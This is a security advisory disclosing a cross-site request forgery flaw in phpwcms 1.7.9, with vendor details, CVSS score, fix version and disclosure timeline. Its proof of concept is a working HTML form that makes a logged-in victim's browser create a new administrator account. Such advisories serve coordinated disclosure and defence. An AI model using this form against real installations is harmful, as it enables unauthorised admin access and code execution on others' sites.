phpwcms 1.7.9: CSRF
Date: 2015-12-02 11:23:491. Introduction
| Affected Product: | phpwcms 1.7.9 |
| Fixed in: | 1.8.0 RC1 |
| Fixed Version Link: | https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip |
| Vendor Website: | http://www.phpwcms.de/ |
| Vulnerability Type: | CSRF |
| Remote Exploitable: | Yes |
| Reported to vendor: | 09/29/2015 |
| Disclosed to public: | 12/02/2015 |
| Release mode: | Coordinated release |
| CVE: | requested, but not assigned |
| Credits | Tim Coen of curesec GmbH |
2. Vulnerability Description
CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
Description
There is no CSRF protection for any forms, which means that an attacker can perform any action a victim can perform, if the victim visits an attacker controlled website while logged in. In the case of phpwcms, an attacker can add an admin user and thus gain code execution.
3. Proof of Concept
Add Admin User:
<html>
<body>
<form action="http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=admin&s=1" method="POST">
<input type="hidden" name="form_newloginname" value="Jane" />
<input type="hidden" name="form_newpassword" value="Smith" />
<input type="hidden" name="form_newemail" value="jane.smith@example.com" />
<input type="hidden" name="form_newrealname" value="Jane Smith" />
<input type="hidden" name="form_feuser" value="2" />
<input type="hidden" name="form_active" value="1" />
<input type="hidden" name="form_admin" value="1" />
<input type="hidden" name="verification_email" value="0" />
<input type="hidden" name="form_aktion" value="create_account" />
<input type="hidden" name="Submit" value="send user data" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
4. Solution
To mitigate this issue please upgrade at least to version 1.8.0 RC1:
https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip
Please note that a newer version might already be available.
5. Report Timeline
| 09/29/2015 | Informed Vendor about Issue |
| 09/29/2015 | Vendor confirmed issues |
| 10/21/2015 | Reminded Vendor of Disclosure Date |
| 10/25/2015 | Vendor requests more time |
| 11/17/2015 | CVE Requested (no reply) |
| 11/24/2015 | Reminded Vendor of Disclosure Date |
| 11/29/2015 | Vendor releases fix |
| 12/02/2015 | Disclosed to public |